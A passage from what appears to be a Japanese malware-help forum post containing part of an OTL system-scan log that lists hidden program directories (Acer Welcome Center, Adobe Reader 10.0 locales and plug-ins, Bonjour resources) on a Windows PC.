[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item33\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item33\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item33\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item34\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item34\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item34\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item40\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item40\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item40\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item60\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item60\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item60\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item61\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item61\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item61\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item901\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item901\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item901\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item903\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item903\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item903\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item990\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item990\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item990\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\MyWinLocker\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\MyWinLocker\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\MyWinLocker\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Nero9\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Nero9\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Nero9\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Office2007\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Office2007\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Office2007\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Photoshop\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Photoshop\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Photoshop\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Photoshop8\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Photoshop8\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Photoshop8\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Works90-85\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Works90-85\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Works90-85\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Works90SE\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Works90SE\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Works90SE\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\Acer
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\Black
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\Blue
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\eMachines
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\Gateway
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\Generic
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\Gray
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\Green
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\Packard Bell
[2012/06/20 12:06:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates
[2014/04/08 15:27:30 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Javascripts
[2015/09/07 23:07:11 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins3d
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Tracker
[2012/06/20 12:06:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\CAT
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\CHS
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\CHT
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\CZE
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\DAN
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\DEU
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\ENU
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\ESP
[2012/06/20 12:06:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\EUQ
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\FRA
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\HRV
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\HUN
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\ITA
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\JPN
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\KOR
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\NLD
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\NOR
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\POL
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\PTB
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\RUM
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\RUS
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\SKY
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\SLV
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\SUO
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\SVE
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\TUR
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\UKR
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\cs_CZ
[2015/09/07 23:07:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\da_DK
[2015/09/07 23:07:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\de_DE
[2015/09/07 23:07:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\es_ES
[2015/09/07 23:07:30 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\eu_ES
[2015/09/07 23:07:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\fi_FI
[2015/09/07 23:07:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\fr_FR
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\hr_HR
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\hu_HU
[2015/09/07 23:07:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\it_IT
[2015/09/07 23:07:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ja_JP
[2015/09/07 23:07:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ko_KR
[2015/09/07 23:07:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\nb_NO
[2015/09/07 23:07:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\nl_NL
[2015/09/07 23:07:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\pt_BR
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ro_RO
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ru_RU
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\sk_SK
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\sl_SI
[2015/09/07 23:07:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\sv_SE
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\tr_TR
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\uk_UA
[2015/09/07 23:07:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\zh_CN
[2015/09/07 23:07:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\zh_TW
  • あすとろ
  • 2015/09/12 (Sat) 23:42:59
返信フォームへ 
OTL3
英数字だと書き込めないため文字埋めです。

[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ca_ES\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\cs_CZ\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\da_DK\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\de_DE\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\es_ES\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\eu_ES\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\fi_FI\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\fr_FR\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\hr_HR\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\hu_HU\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\it_IT\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ja_JP\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ko_KR\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\nb_NO\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\nl_NL\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\pl_PL\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\pt_BR\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ro_RO\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ru_RU\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\sk_SK\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\sl_SI\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\sv_SE\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\tr_TR\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\uk_UA\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\zh_CN\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\zh_TW\Services
[2014/05/21 23:03:51 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\AcroForm
[2012/06/20 12:06:35 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations
[2014/05/21 23:03:52 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\AcroForm\PMP
[2012/06/20 12:06:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps
[2012/06/20 12:06:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\CAT
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\CHS
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\CHT
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\CZE
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\DAN
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\DEU
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\ENU
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\ESP
[2012/06/20 12:06:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\EUQ
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\FRA
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\HRV
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\HUN
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\ITA
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\JPN
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\KOR
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\NLD
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\NOR
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\POL
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\PTB
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\RUM
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\RUS
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\SKY
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\SLV
[2012/06/20 12:06:35 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\SUO
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\SVE
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\TUR
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\UKR
[2015/09/07 23:07:04 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_CZE
[2015/09/07 23:07:05 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_HRV
[2015/09/07 23:07:05 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_HUN
[2015/09/07 23:07:05 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_RUM
[2015/09/07 23:07:04 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_RUS
[2015/09/07 23:07:04 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_SKY
[2015/09/07 23:07:05 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_SLV
[2015/09/07 23:07:05 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_TUR
[2015/09/07 23:07:04 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_UKR
[2012/06/20 12:06:33 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins3d\prc
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Resource\CIDFont
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Resource\SaslPrep
[2012/06/20 12:07:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Resource\Linguistics\LanguageNames2
[2012/06/20 12:06:41 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Resource\TypeSupport\Unicode\Mappings
[2012/06/20 12:06:42 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Resource\TypeSupport\Unicode\Mappings\Adobe
[2012/06/20 12:06:41 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Resource\TypeSupport\Unicode\Mappings\Mac
[2012/06/20 12:06:41 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Resource\TypeSupport\Unicode\Mappings\win
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\da.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\de.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\en.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\en_GB.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\es.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\fi.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\fr.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\it.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\ja.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\ko.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\nb.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\nl.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\pl.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\pt.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\pt_PT.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\ru.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\sv.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\zh_CN.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\zh_TW.lproj
[2015/02/05 17:58:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\EAInstaller
[2012/06/20 11:57:51 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Intel Corporation
[2014/04/23 18:34:35 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\Resources\WebKit
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help
[2012/06/20 12:06:56 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg
